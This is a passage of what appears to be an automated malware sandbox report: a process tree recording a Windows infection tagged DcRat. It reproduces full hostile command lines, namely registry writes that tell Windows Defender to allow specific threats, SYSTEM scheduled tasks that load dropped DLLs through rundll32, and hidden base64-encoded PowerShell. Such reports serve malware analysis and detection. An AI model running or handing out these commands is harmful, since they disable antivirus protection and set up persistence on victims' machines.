\"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 00:48:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\MRKDEaZ.exe\" KS /Aasite_idqTr 385121 /S" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GyWbuVQzPmDmgkCMH"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c hime.bat1⤵
-
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exeC:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exeC:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
-
C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\KIdWkoI.exeC:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\KIdWkoI.exe 3Y /iXsite_idhhU 385121 /S1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP027.TMP\arriveprospect.exeC:\Users\Admin\AppData\Local\Temp\IXP027.TMP\arriveprospect.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP027.TMP\arriveprospect.exeC:\Users\Admin\AppData\Local\Temp\IXP027.TMP\arriveprospect.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP027.TMP\arriveprospect.exeC:\Users\Admin\AppData\Local\Temp\IXP027.TMP\arriveprospect.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP027.TMP\arriveprospect.exeC:\Users\Admin\AppData\Local\Temp\IXP027.TMP\arriveprospect.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exeC:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exeC:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exeC:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
-
C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\bDtyytq.exeC:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\bDtyytq.exe KS /fUsite_idJWq 385118 /S1⤵
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\HOZHUU.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\7c928045-71fd-4079-a694-a05620c301e4\5DB2.exeC:\Users\Admin\AppData\Local\7c928045-71fd-4079-a694-a05620c301e4\5DB2.exe --Task1⤵
-
C:\Users\Admin\AppData\Roaming\rwsdrbbC:\Users\Admin\AppData\Roaming\rwsdrbb1⤵
-
C:\Users\Admin\AppData\Roaming\tbsdrbbC:\Users\Admin\AppData\Roaming\tbsdrbb1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
-
C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\arwOGMc.exeC:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\arwOGMc.exe KS /Kksite_idfEx 385118 /S1⤵
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\bbWHhX.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exeC:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exeC:\Users\Admin\AppData\Local\Temp\b24b726a24\Utsysc.exe1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
